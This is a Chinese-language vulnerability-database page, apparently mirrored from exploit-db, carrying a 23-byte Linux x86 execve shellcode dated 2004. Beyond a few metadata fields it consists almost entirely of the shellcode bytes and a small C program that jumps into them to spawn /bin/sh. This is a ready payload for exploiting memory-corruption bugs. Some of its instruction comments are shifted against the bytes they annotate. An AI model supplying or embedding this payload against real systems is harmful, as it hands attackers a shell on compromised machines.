Linux/x86 - execve() Shellcode (23 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054752 漏洞类型
发布时间 2004-11-15 更新时间 2004-11-15
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13422
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/************************************************************
* Linux 23 byte execve code. Greetz to preedator            *
*                                          marcetam         *
*                                      admin at marcetam.net   *
*************************************************************/
char linux[]=
  "\x99"			/* cdq              */
  "\x52"			/* push %edx        */
  "\x68\x2f\x2f\x73\x68"	/* push $0x68732f2f */
  "\x68\x2f\x62\x69\x6e"	/* push $0x6e69622f */
  "\x89\xe3"			/* mov %esp,%ebx    */
  "\x52"			/* push %edx        */
  "\x54"			/* push %esp        */
  "\x54"			/* push %esp        */
  "\x59\x6a"			/* pop %ecx         */
  "\x0b\x58"			/* push $0x0b       */
  "\xcd\x80";			/* int $0x80        */
int main(){
  void (*run)()=(void *)linux;
  printf("%d bytes \n",strlen(linux));
  run();
}

// milw0rm.com [2004-11-15]